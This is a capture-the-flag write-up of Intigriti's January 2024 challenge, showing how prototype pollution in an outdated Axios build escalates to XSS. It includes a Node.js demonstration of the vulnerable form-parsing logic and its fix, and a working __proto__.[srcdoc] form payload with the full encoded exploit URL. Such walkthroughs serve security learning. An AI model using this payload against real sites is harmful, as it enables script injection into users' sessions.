# Prototype Pollution Leading to XSS Exploitation: Intigriti's January Challenge

## Overview

Intigriti's January 2024 XSS challenge (challenge-0124) turned out to be a case of prototype pollution escalating to XSS. The following steps cover the discovery, analysis and exploitation of the vulnerability in the challenge web application.

### Step 1: Initial Inspection

On initial inspection, some parameters, in particular `name`, were reflected into the page: injecting HTML into the `name` parameter showed that it was rendered as markup. On closer inspection, however, the server applied sanitization to that value, so the `name` parameter alone did not give direct XSS.

![Step One](images/step-1.png)

### Step 2: Checking Packages

The `package.json` file showed that the packages used by the application had been updated recently. Despite this, the page source revealed that Axios and jQuery were not served from those packages but from separate, externally loaded JavaScript files, so the versions declared in `package.json` do not necessarily reflect what actually runs in the browser.

![Step Two](images/step-2.png)

### Step 3: Outdated Package

Further investigation showed that Axios had recently published a security fix (v1.6.4, see the references below) for prototype pollution in its conversion of form data to JSON. Since the form element with id `search` is passed to Axios as request data, the application looked like a candidate for the same issue, and an attempt to exploit it was made. Comparing the source of the Axios build served by the application against the latest release exposed differences that related directly to prototype pollution.

![Step Three](images/step-3.png)

![Step Four](images/step-4.png)

![Step Five](images/step-5.png)
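The Axios behaviour described in Step 3, as an added example that is not part of the original write-up or of Axios itself: a small Node.js re-implementation of the dotted / bracketed field-name walk that Axios' `formDataToJSON` performed before v1.6.4, run over the same field names as the challenge payload (supplied as constructed name/value pairs instead of a live `<form>`), with a `guardProto` switch that applies the `__proto__` check the referenced fix adds. It omits Axios' array-to-object conversion and other details, and all function and variable names are this example's own.

```javascript
'use strict';
// Added example (not code from the write-up or from Axios): a minimal re-implementation of
// the dotted / bracketed field-name parsing that Axios' formDataToJSON did before v1.6.4.
// It omits Axios' array-to-object conversion and other details; only the path walk matters.

// "a.b", "a[b]" and "a.[b]" all parse to ["a", "b"], matching the names used in the payload.
function parsePropPath(name) {
  return [...name.matchAll(/\w+|\[(\w*)]/g)].map(m => (m[0] === '[]' ? '' : m[1] || m[0]));
}

function isObject(x) {
  return x !== null && typeof x === 'object';
}

// Walks `path` into `target`, creating containers on the way.
// guardProto=false reproduces the vulnerable behaviour; guardProto=true adds the fix.
function buildPath(path, value, target, index, guardProto) {
  let name = path[index++];
  // The fix: refuse to descend into (or assign) __proto__. Without it, target["__proto__"]
  // is Object.prototype, and the recursion below writes attacker keys onto every object.
  if (guardProto && name === '__proto__') return true;
  const isNumericKey = Number.isFinite(+name);
  const isLast = index >= path.length;
  name = !name && Array.isArray(target) ? target.length : name;

  if (isLast) {
    if (Object.prototype.hasOwnProperty.call(target, name)) {
      target[name] = [target[name], value]; // repeated field names collect into an array
    } else {
      target[name] = value;
    }
    return !isNumericKey;
  }
  if (!target[name] || !isObject(target[name])) target[name] = [];
  buildPath(path, value, target[name], index, guardProto);
  return !isNumericKey;
}

// `entries` is any iterable of [fieldName, value] pairs, e.g. the result of FormData#entries().
function formDataToJSON(entries, guardProto) {
  const obj = {};
  for (const [name, value] of entries) {
    buildPath(parsePropPath(name), value, obj, 0, guardProto);
  }
  return obj;
}

// Constructed sample input: the field names from the challenge payload as plain pairs,
// so the example runs in Node.js without a DOM.
const POLLUTING_FIELDS = [
  ['__proto__.[srcdoc]', '<script>alert(1)</script>'],
  ['__proto__.homepage', 'https://example.com'],
  ['__proto__.owner.avatar_url', 'true'],
  ['search', 'binaryjs'],
];

// Parses the fields, then reports what an unrelated, freshly created object inherits.
// The polluted keys are removed afterwards so the process is left clean.
function pollutionProbe(guardProto) {
  const parsed = formDataToJSON(POLLUTING_FIELDS, guardProto);
  const victim = {};
  const seen = {
    search: parsed.search,
    srcdoc: victim.srcdoc,
    homepage: victim.homepage,
    avatar_url: victim.owner && victim.owner.avatar_url,
  };
  for (const k of ['srcdoc', 'homepage', 'owner']) delete Object.prototype[k];
  return seen;
}

console.log('vulnerable:', pollutionProbe(false));
console.log('fixed:     ', pollutionProbe(true));
```

Run it with `node`. With `guardProto` false, a fresh `{}` created after the parse reads `srcdoc`, `homepage` and `owner.avatar_url` straight from `Object.prototype`, which is what lets rendering code that never mentions those keys pick up attacker-controlled attribute values. With the guard on, only the ordinary `search` field survives and the fresh object inherits nothing.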
### Step 4: Crafting Payload

By injecting a `<form>` with the id `search`, it was observed that Axios serialised that form and sent its fields to the server. Prototype pollution was achieved by giving the form's inputs names with `__proto__.` paths, which the application's Axios build copied onto `Object.prototype`. At first the pollution only had an effect when the server returned an empty array because there were no results. A closer look at how the result values were passed through jQuery's sanitization showed that a polluted `srcdoc` property ends up on an `<iframe>` element, which executes the injected script.

**Final Payload on `name` Parameter** (decoded from the URL below):

```html
<form id="search">
  <input name="__proto__.[srcdoc]" value="<script>alert(parent.window.location.origin)</script>">
  <input name="__proto__.[srcdoc]" value="">
  <input name="__proto__.homepage" value="https://example.com">
  <input name="__proto__.owner.avatar_url" value="true">
</form>
```

https://challenge-0124.intigriti.io/challenge?name=%3Cform%20id=%22search%22%3E%3Cinput%20name=%22__proto__.[srcdoc]%22%20value=%22%3Cscript%3Ealert(parent.window.location.origin)%3C/script%3E%22%3E%3Cinput%20name=%22__proto__.[srcdoc]%22%20value=%22%22%3E%3Cinput%20name=%22__proto__.homepage%22%20value=%22https://example.com%22%3E%3Cinput%20name=%22__proto__.owner.avatar_url%22%20value=%22true%22%3E%3C/form%3E&search=binaryjs

### Step 5: XSS Exploitation

The crafted payload triggered script execution in the challenge origin, demonstrating the impact of prototype pollution in the application.

![Step Six](images/step-6.png)

This walkthrough shows how prototype pollution in an outdated client-side library escalated to XSS. It underlines the importance of keeping dependencies current, including library copies shipped as static files rather than through `package.json`, and of checking which version the browser actually loads.

#### References

* https://challenge-0124.intigriti.io/
* https://challenge-0124.intigriti.io/challenge
* https://github.com/axios/axios/releases/tag/v1.6.4
* https://github.com/axios/axios/commit/3c0c11cade045c4412c242b5727308cff9897a0e